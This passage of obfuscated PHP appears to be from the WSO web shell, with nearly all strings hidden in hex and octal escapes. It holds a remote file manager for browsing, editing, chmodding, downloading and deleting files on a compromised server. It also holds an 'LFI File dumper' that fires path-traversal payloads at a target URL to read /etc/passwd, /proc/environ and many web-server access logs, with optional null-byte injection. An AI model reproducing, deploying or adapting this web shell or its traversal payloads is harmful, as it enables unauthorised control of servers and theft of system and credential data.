"\x3c\x73\x63\x72\x69\160\x74\x3e\xa\x20\40\x20\x20\x66\165\x6e\x63\x74\151\157\x6e\x20\163\141\x28\51\x20\173\12\40\40\40\40\x20\x20\40\40\146\157\162\x28\151\75\x30\73\151\74\144\56\146\151\x6c\x65\163\x2e\x65\x6c\x65\x6d\x65\x6e\164\163\56\x6c\145\156\147\164\150\x3b\151\53\53\51\12\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\x69\146\x28\144\56\146\151\x6c\x65\x73\x2e\145\154\x65\155\145\x6e\x74\x73\133\151\x5d\56\164\x79\x70\145\40\x3d\x3d\40\47\x63\150\x65\x63\x6b\x62\x6f\170\47\x29\12\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\144\x2e\x66\151\154\x65\163\56\x65\x6c\x65\155\x65\156\x74\x73\x5b\151\135\x2e\x63\x68\x65\143\x6b\x65\x64\40\75\40\144\x2e\x66\151\x6c\x65\x73\56\145\x6c\145\x6d\x65\156\164\x73\x5b\x30\135\x2e\x63\x68\x65\143\x6b\145\144\x3b\12\x20\x20\x20\40\x7d\12\40\xa\74\x2f\x73\143\162\151\x70\164\x3e\12\74\x74\x61\x62\154\145\x20\167\x69\x64\164\x68\x3d\47\61\60\60\x25\x27\40\x63\154\141\x73\163\75\47\155\x61\151\x6e\47\40\x63\x65\154\154\163\x70\141\x63\x69\x6e\147\75\47\x30\x27\40\x63\x65\x6c\154\x70\x61\144\x64\151\156\147\x3d\47\62\x27\76\12\74\146\x6f\x72\x6d\40\x6e\x61\155\x65\75\x66\151\154\145\163\x20\155\145\164\150\157\x64\75\160\157\163\164\76\x3c\x74\x72\x3e\x3c\x74\x68\x20\167\151\x64\164\x68\75\x27\x31\x33\160\170\x27\76\x3c\151\x6e\x70\165\x74\40\x74\171\160\145\x3d\143\150\x65\x63\x6b\x62\157\170\40\x6f\x6e\x63\x6c\151\143\153\x3d\47\x73\x61\x28\51\x27\x20\143\154\141\x73\x73\75\143\150\153\x62\170\76\x3c\x2f\164\150\x3e\74\x74\x68\x3e\x3c\141\40\150\x72\x65\146\75\x27\x23\x27\x20\x6f\156\x63\154\x69\143\x6b\75\47\x67\50\42\x46\x69\154\145\x73\x4d\x61\x6e\x22\54\x6e\165\154\154\x2c\x22\163\137\x6e\x61\x6d\x65\137" . ($sort[1] ? 0 : 1) . "\x22\51\47\76\x4e\141\155\x65\74\57\141\76\74\57\x74\150\x3e\74\x74\x68\76\x3c\x61\40\150\162\x65\146\x3d\47\x23\47\x20\157\156\x63\154\151\x63\153\75\x27\x67\x28\x22\x46\x69\154\x65\x73\x4d\141\x6e\x22\x2c\156\165\x6c\x6c\54\42\163\x5f\x73\x69\x7a\x65\137" . ($sort[1] ? 0 : 1) . "\42\x29\x27\x3e\x53\x69\172\x65\74\57\141\76\x3c\x2f\x74\150\x3e\x3c\164\x68\x3e\x3c\x61\40\x68\162\x65\x66\x3d\x27\43\47\40\157\156\x63\x6c\151\x63\x6b\75\47\x67\x28\x22\106\x69\154\145\163\115\141\156\x22\54\156\x75\x6c\154\x2c\x22\163\137\x6d\157\x64\x69\146\171\x5f" . ($sort[1] ? 0 : 1) . "\42\x29\x27\x3e\x4d\x6f\x64\151\146\171\74\x2f\x61\76\x3c\x2f\164\150\76\x3c\164\x68\x3e\117\x77\156\x65\x72\57\107\x72\x6f\x75\x70\74\x2f\x74\150\x3e\74\164\x68\x3e\x3c\x61\x20\150\162\x65\146\75\x27\x23\x27\x20\x6f\156\x63\154\x69\x63\153\x3d\x27\147\50\x22\x46\151\x6c\x65\x73\x4d\x61\156\x22\54\156\165\154\x6c\54\x22\163\137\x70\145\x72\155\x73\137" . ($sort[1] ? 0 : 1) . "\x22\51\x27\76\x50\x65\x72\x6d\151\x73\x73\x69\157\156\163\74\57\x61\x3e\x3c\57\x74\x68\x3e\74\164\150\76\x41\143\x74\151\157\x6e\163\x3c\x2f\164\x68\76\74\57\x74\162\76"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\x6e\141\155\x65" => $dirContent[$i], "\x70\141\164\x68" => $GLOBALS["\x63\x77\144"] . $dirContent[$i], "\x6d\x6f\x64\x69\146\x79" => date("\x59\x2d\x6d\55\144\40\110\72\x69\x3a\x73", @filemtime($GLOBALS["\x63\x77\144"] . $dirContent[$i])), "\x70\x65\x72\155\x73" => wsoPermsColor($GLOBALS["\143\167\x64"] . $dirContent[$i]), "\163\151\x7a\145" => @filesize($GLOBALS["\x63\167\144"] . $dirContent[$i]), "\x6f\167\156\x65\162" => $ow["\156\x61\155\145"] ? $ow["\156\x61\155\x65"] : @fileowner($dirContent[$i]), "\147\x72\x6f\165\x70" => $gr["\x6e\141\x6d\145"] ? $gr["\x6e\141\155\x65"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\x63\x77\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\x79\x70\x65" => "\146\151\154\145")); } elseif (@is_link($GLOBALS["\x63\x77\x64"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\x74\171\x70\x65" => "\x6c\151\156\x6b", "\154\x69\x6e\153" => readlink($tmp["\160\141\164\150"]))); } elseif (@is_dir($GLOBALS["\x63\x77\144"] . $dirContent[$i]) && $dirContent[$i] != "\x2e") { $dirs[] = array_merge($tmp, array("\x74\x79\160\145" => "\x64\x69\x72")); } } $GLOBALS["\x73\x6f\x72\x74"] = $sort; function wsoCmp($a, $b) { if ($GLOBALS["\x73\x6f\x72\164"][0] != "\x73\151\x7a\x65") { return strcmp(strtolower($a[$GLOBALS["\x73\x6f\x72\x74"][0]]), strtolower($b[$GLOBALS["\x73\157\x72\164"][0]])) * ($GLOBALS["\x73\x6f\162\x74"][1] ? 1 : -1); } else { return ($a["\x73\x69\x7a\x65"] < $b["\163\x69\172\145"] ? -1 : 1) * ($GLOBALS["\x73\157\162\164"][1] ? 1 : -1); } } usort($files, "\167\163\x6f\103\155\x70"); usort($dirs, "\167\x73\157\x43\x6d\x70"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "\x3c\164\x72" . ($l ? "\40\143\154\x61\163\163\x3d\x6c\x31" : '') . "\76\x3c\x74\x64\x3e\x3c\151\x6e\x70\165\x74\x20\164\171\160\x65\75\x63\x68\x65\x63\x6b\x62\157\x78\40\156\x61\155\145\x3d\x22\x66\x5b\x5d\42\x20\x76\x61\x6c\165\145\x3d\x22" . urlencode($f["\x6e\x61\x6d\145"]) . "\42\40\x63\x6c\x61\x73\x73\75\x63\150\x6b\142\x78\x3e\74\57\x74\x64\76\x3c\164\144\x3e\74\x61\x20\150\162\x65\146\x3d\x23\x20\157\156\143\x6c\151\x63\x6b\x3d\x22" . ($f["\x74\171\160\145"] == "\x66\x69\154\145" ? "\x67\50\x27\x46\151\x6c\x65\163\124\157\157\x6c\x73\47\54\x6e\x75\154\154\x2c\x27" . urlencode($f["\156\141\155\145"]) . "\47\54\x20\47\x76\151\x65\167\47\x29\42\x3e" . htmlspecialchars($f["\x6e\x61\x6d\x65"]) : "\x67\x28\47\x46\x69\x6c\x65\x73\x4d\141\x6e\47\54\47" . $f["\x70\x61\x74\150"] . "\x27\x29\x3b\42\40\x74\151\x74\154\145\75" . $f["\154\x69\156\x6b"] . "\x3e\74\142\76\x5b\x20" . htmlspecialchars($f["\156\x61\155\x65"]) . "\40\135\x3c\57\x62\x3e") . "\x3c\x2f\x61\76\x3c\57\x74\x64\76\x3c\164\144\x3e" . ($f["\164\x79\160\x65"] == "\146\151\x6c\145" ? wsoViewSize($f["\163\151\x7a\x65"]) : $f["\x74\x79\x70\x65"]) . "\x3c\x2f\164\144\x3e\74\x74\144\x3e" . $f["\155\x6f\144\x69\146\x79"] . "\74\57\164\x64\76\74\x74\144\x3e" . $f["\157\167\x6e\145\162"] . "\57" . $f["\147\x72\157\165\x70"] . "\x3c\57\164\x64\76\x3c\164\144\76\74\141\x20\150\162\145\x66\75\43\40\x6f\x6e\x63\154\x69\x63\153\75\42\x67\50\47\106\x69\x6c\x65\163\x54\x6f\157\x6c\163\47\x2c\x6e\165\154\x6c\54\47" . urlencode($f["\156\141\x6d\x65"]) . "\x27\54\x27\143\x68\155\x6f\144\x27\51\x22\x3e" . $f["\x70\x65\162\x6d\163"] . "\74\x2f\164\x64\x3e\74\164\144\x3e\x3c\x61\40\x68\162\x65\146\75\x22\43\42\40\157\x6e\x63\x6c\x69\143\153\75\x22\x67\x28\x27\106\x69\154\145\x73\124\157\157\x6c\x73\47\x2c\156\x75\x6c\x6c\54\x27" . urlencode($f["\156\141\x6d\145"]) . "\47\x2c\40\47\162\x65\156\x61\x6d\x65\x27\51\x22\76\x52\x3c\57\x61\76\40\x3c\141\x20\150\162\145\146\x3d\42\x23\x22\40\x6f\156\x63\x6c\x69\x63\153\75\42\147\x28\47\x46\x69\154\x65\x73\x54\157\x6f\x6c\163\x27\54\156\165\154\154\x2c\47" . urlencode($f["\x6e\x61\x6d\x65"]) . "\x27\54\40\x27\x74\x6f\x75\x63\x68\47\x29\x22\x3e\124\74\x2f\141\76" . ($f["\x74\171\160\145"] == "\146\x69\154\x65" ? "\40\74\141\x20\x68\162\x65\x66\75\x22\x23\x22\40\x6f\x6e\143\x6c\151\143\153\x3d\x22\147\50\47\x46\151\154\x65\163\124\x6f\x6f\x6c\163\x27\54\x6e\165\x6c\x6c\x2c\47" . urlencode($f["\x6e\141\155\x65"]) . "\47\x2c\x20\x27\x65\x64\x69\164\47\51\x22\76\105\74\x2f\x61\76\x20\x3c\x61\x20\x68\x72\145\146\x3d\x22\43\42\40\x6f\156\143\x6c\151\x63\153\75\x22\x67\50\x27\x46\151\x6c\x65\x73\124\x6f\x6f\x6c\x73\47\54\156\x75\x6c\154\54\x27" . urlencode($f["\x6e\141\x6d\145"]) . "\47\x2c\x20\47\144\x6f\167\156\x6c\x6f\141\x64\x27\x29\x22\76\104\x3c\57\x61\x3e" : '') . "\x3c\57\164\144\x3e\74\x2f\x74\162\76"; $l = $l ? 0 : 1; } echo "\x3c\x74\x72\x3e\x3c\164\x64\x20\143\x6f\x6c\163\x70\x61\156\x3d\67\x3e\12\40\12\40\x20\x20\40\x3c\151\x6e\x70\165\x74\40\164\171\160\145\75\x68\151\x64\x64\145\x6e\40\x6e\x61\x6d\x65\75\x61\40\166\141\154\165\145\x3d\47\106\151\154\x65\163\x4d\x61\156\x27\x3e\xa\x20\x20\40\x20\x3c\151\x6e\160\165\x74\40\164\171\x70\145\75\x68\151\144\144\145\x6e\x20\x6e\x61\x6d\x65\75\x63\x20\x76\x61\x6c\x75\x65\x3d\x27" . htmlspecialchars($GLOBALS["\143\167\144"]) . "\47\76\xa\x20\x20\x20\x20\74\x69\x6e\x70\165\164\x20\x74\x79\x70\x65\75\x68\151\x64\144\x65\x6e\40\156\x61\x6d\x65\75\x63\x68\x61\162\163\145\164\x20\x76\141\x6c\x75\x65\x3d\x27" . (isset($_POST["\143\x68\141\162\x73\145\x74"]) ? $_POST["\x63\x68\141\162\x73\x65\x74"] : '') . "\x27\76\12\40\40\x20\40\x3c\163\145\x6c\x65\143\164\40\156\141\155\145\75\x27\x70\61\47\76\x3c\157\x70\x74\151\157\156\40\166\x61\x6c\165\x65\x3d\x27\x63\x6f\160\171\x27\76\103\x6f\160\x79\x3c\x2f\x6f\160\x74\151\157\156\x3e\74\157\160\x74\x69\x6f\156\40\166\x61\154\x75\145\75\47\155\157\x76\x65\47\76\115\x6f\166\145\74\x2f\157\x70\164\x69\x6f\156\76\x3c\157\x70\x74\x69\x6f\156\x20\166\141\154\165\145\75\x27\144\x65\x6c\145\164\x65\47\x3e\x44\x65\154\145\164\x65\74\x2f\157\160\164\x69\x6f\156\76"; if (class_exists("\x5a\x69\x70\101\x72\x63\150\x69\166\145")) { echo "\x3c\157\160\164\151\157\x6e\40\166\141\154\x75\x65\75\x27\172\x69\160\47\76\x43\157\155\x70\x72\x65\x73\x73\40\x28\x7a\151\160\x29\x3c\x2f\157\x70\164\151\157\x6e\x3e\x3c\x6f\160\164\x69\x6f\156\x20\x76\141\x6c\165\145\x3d\x27\x75\156\x7a\151\160\47\x3e\125\x6e\x63\x6f\x6d\160\162\145\163\163\x20\50\x7a\x69\x70\51\x3c\x2f\157\160\164\x69\x6f\x6e\x3e"; } echo "\x3c\157\160\164\151\157\x6e\40\x76\x61\x6c\165\x65\75\x27\x74\x61\162\47\76\x43\x6f\x6d\160\x72\145\x73\x73\40\x28\x74\141\x72\56\x67\172\x29\x3c\x2f\157\x70\x74\151\157\x6e\76"; if (!empty($_SESSION["\x61\x63\x74"]) && @count($_SESSION["\x66"])) { echo "\74\x6f\160\x74\151\x6f\156\x20\x76\141\154\x75\145\75\x27\x70\141\163\164\x65\47\76\x50\141\x73\x74\x65\x20\57\40\103\157\x6d\160\162\x65\163\163\74\57\157\160\x74\151\157\x6e\76"; } echo "\74\57\x73\x65\154\145\x63\164\x3e\x26\156\142\x73\160\x3b"; if (!empty($_SESSION["\141\143\164"]) && @count($_SESSION["\146"]) && ($_SESSION["\x61\x63\164"] == "\172\151\x70" || $_SESSION["\141\x63\164"] == "\x74\141\x72")) { echo "\x66\151\154\x65\x20\x6e\141\x6d\145\72\x20\x3c\x69\156\160\165\164\40\x74\x79\160\x65\x3d\x74\145\170\x74\x20\x6e\x61\155\x65\75\160\x32\x20\166\x61\154\x75\x65\75\47\x77\163\x6f\x5f" . date("\x59\155\x64\x5f\110\151\163") . "\x2e" . ($_SESSION["\x61\143\x74"] == "\172\151\160" ? "\x7a\151\x70" : "\164\141\x72\x2e\147\x7a") . "\x27\76\x26\156\142\x73\x70\73"; } echo "\74\151\x6e\160\165\164\40\164\x79\x70\x65\x3d\x27\163\x75\x62\x6d\x69\164\47\40\166\141\154\165\145\75\x27\76\x3e\47\x3e\74\x2f\x74\144\76\x3c\57\x74\162\x3e\74\57\146\157\162\x6d\x3e\74\57\164\x61\142\154\145\x3e\x3c\57\x64\x69\x76\x3e"; wsoFooter(); } goto T8b3I; MG4ce: function actionlfiscan() { wsoHeader(); print "\12\x20\x20\x20\74\x68\63\76\114\x65\144\55\x5a\x65\160\160\x65\154\x69\x6e\x27\x73\x20\114\x46\x49\x20\x46\x69\154\x65\40\144\165\155\160\x65\162\74\57\x68\x33\x3e\12\x20\xa\40\40\40\74\146\157\162\155\40\155\x65\164\150\x6f\144\75\42\x70\x6f\163\164\42\40\x61\x63\164\x69\x6f\156\75\x22\77\42\x3e\x3c\x69\156\160\x75\164\x20\164\171\x70\145\x3d\42\150\151\144\144\145\x6e\x22\40\x6e\141\x6d\145\75\42\x61\42\x20\x76\141\x6c\x75\145\75\42\154\146\x69\163\x63\x61\x6e\42\76\12\x20\x20\x20\40\40\40\x4c\106\111\40\125\122\114\72\x20\x3c\151\x6e\x70\x75\164\40\x74\x79\x70\145\x3d\42\164\145\x78\164\42\x20\x73\151\172\x65\75\42\x36\x30\x22\x20\156\x61\155\145\75\42\154\146\x69\x75\x72\154\42\40\x76\141\x6c\x75\x65\x3d\42\42\x3e\40\x3c\x69\x6e\x70\x75\164\40\164\x79\160\145\75\42\x73\x75\142\x6d\x69\x74\42\40\166\x61\154\x75\x65\x3d\x22\107\x6f\42\x3e\40\106\x69\x6c\x65\72\40\74\163\x65\154\145\143\164\40\x6e\x61\x6d\145\75\42\163\x63\141\x6e\164\x79\160\145\x22\76\12\40\40\x20\x20\x20\40\40\40\40\x3c\x6f\160\x74\151\157\156\x20\166\141\154\165\x65\x3d\x22\x31\42\x3e\12\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\101\x63\x63\x65\x73\163\x20\114\x6f\x67\xa\x20\40\x20\40\x20\40\40\40\40\x3c\57\x6f\x70\x74\x69\157\x6e\x3e\xa\40\xa\x20\x20\40\x20\40\x20\40\x20\40\74\157\160\164\x69\157\x6e\40\x76\x61\x6c\x75\x65\75\x22\62\x22\76\xa\40\40\x20\40\40\x20\40\40\40\x20\40\x20\150\x74\x74\160\144\56\x63\x6f\x6e\x66\xa\x20\40\40\x20\40\40\40\40\40\74\57\x6f\x70\164\151\157\x6e\x3e\12\x20\xa\x20\40\x20\40\40\40\x20\40\40\74\x6f\x70\x74\151\x6f\156\x20\x76\141\154\165\x65\x3d\x22\63\42\76\12\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\105\x72\x72\157\162\x20\114\x6f\x67\12\40\x20\40\40\x20\40\x20\x20\40\x3c\57\157\160\164\151\x6f\x6e\76\12\x20\40\40\x20\40\x20\40\x20\40\74\x6f\160\x74\x69\157\156\40\x76\141\154\165\x65\x3d\x22\64\x22\x3e\12\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\160\150\x70\56\151\x6e\151\12\x20\40\x20\40\x20\40\x20\40\40\74\x2f\157\160\x74\x69\x6f\x6e\76\xa\40\40\x20\x20\x20\40\40\40\x20\74\157\160\x74\151\157\156\x20\x76\x61\154\x75\x65\x3d\42\65\x22\76\xa\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\115\171\x53\121\114\12\40\x20\40\40\40\x20\40\40\x20\x3c\x2f\157\160\x74\x69\157\156\76\12\x20\x20\x20\40\40\x20\x20\40\x20\74\157\160\164\x69\157\156\40\x76\141\154\x75\x65\x3d\42\x36\42\x3e\xa\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x46\x54\120\12\40\x20\x20\40\40\40\x20\x20\x20\x3c\57\157\x70\x74\x69\x6f\156\76\xa\40\x20\x20\x20\x20\x20\x20\40\40\74\157\160\164\x69\x6f\156\x20\x76\x61\x6c\x75\145\x3d\x22\x37\x22\76\12\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\105\156\x76\x69\162\x6f\156\12\x20\x20\40\40\40\x20\40\40\40\74\57\157\160\164\151\157\156\x3e\12\40\40\40\x20\x20\40\x3c\57\x73\145\154\x65\x63\164\76\x20\116\165\x6c\x6c\x3a\40\x3c\163\x65\x6c\x65\x63\x74\40\156\x61\x6d\145\x3d\42\x6e\165\154\154\42\x3e\xa\40\40\40\x20\40\40\x20\x20\40\74\157\160\164\151\157\156\x20\166\141\x6c\165\x65\75\42\45\60\60\42\76\12\40\40\x20\40\40\x20\40\x20\x20\x20\40\40\x59\145\163\12\40\x20\x20\40\40\40\40\x20\40\x3c\57\157\x70\164\151\x6f\x6e\76\12\x20\12\40\x20\x20\x20\40\40\40\40\x20\74\157\x70\164\x69\x6f\156\40\x76\141\x6c\165\x65\x3d\x22\42\x3e\xa\40\40\x20\40\40\40\x20\x20\x20\x20\40\x20\116\x6f\12\x20\x20\x20\40\x20\x20\40\40\x20\74\x2f\157\160\164\151\157\x6e\x3e\12\40\40\x20\40\40\x20\x3c\x2f\x73\145\x6c\x65\x63\164\76\40\125\x73\145\x72\55\x41\147\145\x6e\164\72\40\x3c\x69\x6e\160\165\164\x20\x74\x79\160\x65\x3d\x22\x74\145\170\164\42\40\163\x69\172\145\75\x22\x32\x30\x22\x20\x6e\141\x6d\145\75\42\x63\165\x73\164\157\155\x5f\150\145\141\x64\x65\x72\42\40\166\141\x6c\x75\145\x3d\x22\x22\x3e\xa\x20\40\x20\x3c\x2f\146\157\162\x6d\76"; error_reporting(0); if ($_POST["\154\146\x69\x75\162\x6c"]) { print "\74\x70\162\x65\x3e"; $cheader = $_POST["\x63\x75\163\164\x6f\x6d\x5f\150\145\141\x64\145\x72"]; $target = $_POST["\154\x66\151\165\x72\x6c"]; $type = $_POST["\163\x63\141\x6e\164\x79\x70\x65"]; $byte1 = $_POST["\156\x75\x6c\154"]; $lfitest = "\56\56\57\x2e\56\57\x2e\x2e\57\56\56\x2f\56\x2e\57\x2e\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\56\56\57\x2e\x2e\x2f\56\56\x2f\56\x2e\57\145\164\x63\57\x70\x61\x73\x73\x77\x64" . $byte1 . ''; $lfitest2 = "\56\56\x2f\56\56\x2f\56\56\x2f\56\56\x2f\56\56\x2f\56\x2e\x2f\56\x2e\57\x2e\56\x2f\56\x2e\57\56\x2e\x2f\x2e\x2e\57\56\x2e\x2f\x2e\x2e\57\56\56\57\146\x61\153\145\x2f\x66\x69\x6c\145" . $byte1 . ''; $lfiprocenv = "\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\56\x2e\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\57\56\56\x2f\56\56\57\56\56\57\56\x2e\57\x2e\x2e\57\56\56\57\x2e\56\57\160\162\157\143\57\145\x6e\166\151\x72\157\156" . $byte1 . ''; $lfiaccess = array(1 => "\56\56\57\56\56\x2f\x2e\x2e\57\x2e\56\x2f\x2e\x2e\57\x2e\x2e\57\56\56\57\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\57\x61\x70\x61\x63\150\145\x2f\154\x6f\x67\163\57\141\143\143\145\163\163\56\x6c\x6f\147" . $byte1 . '', 2 => "\56\x2e\57\x2e\56\x2f\56\56\x2f\56\56\57\x2e\x2e\57\56\56\57\x2e\x2e\57\56\56\x2f\x2e\x2e\57\x2e\56\57\56\x2e\57\56\56\57\56\56\57\56\x2e\57\145\x74\143\x2f\150\x74\x74\160\x64\x2f\x6c\157\147\163\57\141\143\x63\145\163\137\x6c\157\147" . $byte1 . '', 3 => "\x2e\56\x2f\56\56\57\x2e\56\x2f\x2e\x2e\x2f\56\56\x2f\56\56\x2f\56\56\57\56\x2e\x2f\x2e\56\x2f\56\56\57\x2e\x2e\57\x2e\x2e\57\56\x2e\57\56\x2e\57\145\x74\143\x2f\x68\164\164\x70\144\x2f\154\157\x67\x73\x2f\141\x63\x63\145\163\56\154\x6f\147" . $byte1 . '', 4 => "\x2e\x2e\57\x2e\56\x2f\x2e\56\57\56\x2e\57\x2e\x2e\x2f\56\56\57\x2e\56\x2f\56\56\57\56\56\x2f\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\166\x61\x72\57\167\167\167\57\154\x6f\x67\163\x2f\141\x63\143\x65\x73\163\x5f\154\157\x67" . $byte1 . '', 5 => "\56\x2e\57\56\x2e\57\56\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\56\56\57\56\56\57\56\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\57\x76\x61\162\57\x77\x77\167\57\154\x6f\x67\163\57\141\x63\x63\145\x73\163\56\x6c\x6f\147" . $byte1 . '', 6 => "\56\x2e\57\56\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\56\57\x2e\56\57\x2e\56\57\x2e\x2e\x2f\56\56\57\56\56\57\x2e\x2e\57\56\x2e\57\165\x73\x72\57\x6c\157\143\x61\x6c\57\x61\160\141\x63\x68\x65\x2f\x6c\x6f\147\x73\x2f\141\x63\x63\145\x73\163\x5f\x6c\157\147" . $byte1 . '', 7 => "\x2e\56\57\56\x2e\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\56\56\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\56\x2e\x2f\x75\x73\162\57\x6c\157\x63\141\154\x2f\141\160\141\x63\x68\145\57\x6c\x6f\147\163\57\141\x63\143\x65\x73\163\x2e\154\157\147" . $byte1 . '', 8 => "\56\56\57\x2e\56\57\x2e\x2e\57\x2e\x2e\57\x2e\56\57\x2e\56\x2f\56\x2e\x2f\56\x2e\57\56\56\57\56\56\57\56\56\57\56\x2e\x2f\x2e\56\x2f\56\56\57\x76\x61\x72\x2f\x6c\x6f\147\x2f\141\160\x61\x63\x68\x65\x2f\141\143\x63\145\x73\163\137\154\157\147" . $byte1 . '', 9 => "\56\x2e\57\x2e\x2e\57\x2e\56\57\x2e\56\57\56\x2e\57\56\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\x76\x61\x72\x2f\154\157\x67\x2f\141\160\141\x63\x68\x65\62\x2f\141\143\143\x65\163\163\137\154\x6f\x67" . $byte1 . '', 10 => "\x2e\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\56\56\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\56\56\57\x2e\x2e\x2f\x2e\x2e\57\56\56\57\56\56\x2f\x76\x61\x72\57\154\157\147\x2f\141\x70\x61\x63\x68\145\57\141\x63\143\x65\163\x73\56\x6c\157\x67" . $byte1 . '', 11 => "\x2e\56\57\56\56\x2f\56\56\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\56\57\56\56\x2f\x2e\56\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\57\x76\141\162\57\x6c\x6f\x67\x2f\x61\x70\141\143\x68\x65\x32\x2f\x61\143\143\145\x73\163\56\154\x6f\x67" . $byte1 . '', 12 => "\56\x2e\57\x2e\x2e\57\x2e\56\57\x2e\x2e\57\x2e\56\57\56\x2e\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\56\56\57\x2e\56\57\x2e\56\57\56\56\57\56\x2e\57\166\141\162\57\x6c\x6f\x67\57\x61\x63\143\x65\x73\x73\x5f\x6c\x6f\x67" . $byte1 . '', 13 => "\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\x2f\56\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\56\x2e\x2f\x2e\56\x2f\x76\x61\162\57\x6c\157\x67\57\x61\x63\x63\145\x73\163\56\x6c\x6f\147" . $byte1 . '', 14 => "\x2e\x2e\57\56\x2e\x2f\x2e\x2e\57\56\56\57\56\56\x2f\x2e\x2e\57\56\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\56\56\57\56\56\x2f\56\x2e\x2f\166\141\162\x2f\x6c\x6f\x67\x2f\x68\164\164\x70\x64\57\x61\x63\x63\145\x73\x73\137\x6c\x6f\147" . $byte1 . '', 15 => "\x2e\x2e\57\x2e\56\57\x2e\56\x2f\56\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\x2e\57\x2e\56\57\x2e\56\57\56\x2e\x2f\56\x2e\57\56\56\57\x2e\x2e\x2f\56\x2e\57\141\x70\x61\143\150\145\62\57\154\157\x67\163\x2f\x61\x63\143\x65\163\x73\x2e\x6c\x6f\147" . $byte1 . '', 16 => "\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\x2e\56\x2f\56\56\57\56\56\x2f\56\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\57\56\56\57\x6c\157\147\x73\x2f\141\x63\x63\145\163\x73\x2e\154\157\147" . $byte1 . '', 17 => "\x2e\56\57\56\x2e\57\x2e\x2e\57\56\56\57\x2e\x2e\57\x2e\56\x2f\56\56\57\x2e\56\x2f\x2e\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\165\163\162\x2f\x6c\x6f\x63\141\154\x2f\141\160\x61\143\x68\145\x32\x2f\x6c\x6f\147\163\x2f\141\143\x63\145\x73\163\137\154\x6f\147" . $byte1 . '', 18 => "\x2e\56\57\56\56\57\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\56\56\x2f\56\x2e\x2f\56\56\x2f\56\56\57\x2e\x2e\57\56\x2e\57\56\x2e\x2f\56\56\x2f\x75\163\x72\57\154\157\x63\x61\x6c\57\x61\x70\141\143\x68\145\62\x2f\154\x6f\147\163\x2f\141\x63\x63\145\163\x73\x2e\154\x6f\147" . $byte1 . '', 19 => "\56\56\57\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\57\166\141\162\57\154\x6f\147\57\x68\x74\x74\x70\x64\x2f\141\143\x63\145\x73\163\x2e\x6c\x6f\147" . $byte1 . '', 20 => "\x2e\56\x2f\x2e\56\57\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\x2e\56\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\57\56\56\57\x2e\56\x2f\x2e\x2e\x2f\157\160\164\57\x6c\x61\155\x70\160\57\154\x6f\147\163\57\x61\x63\143\145\x73\163\x5f\154\x6f\147" . $byte1 . '', 21 => "\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\56\56\57\56\x2e\57\x2e\x2e\x2f\56\56\57\56\56\x2f\x2e\x2e\57\56\x2e\x2f\x2e\56\57\56\56\x2f\157\160\164\57\x78\x61\155\160\x70\x2f\x6c\x6f\147\x73\x2f\141\x63\143\x65\x73\163\x5f\x6c\x6f\147" . $byte1 . '', 22 => 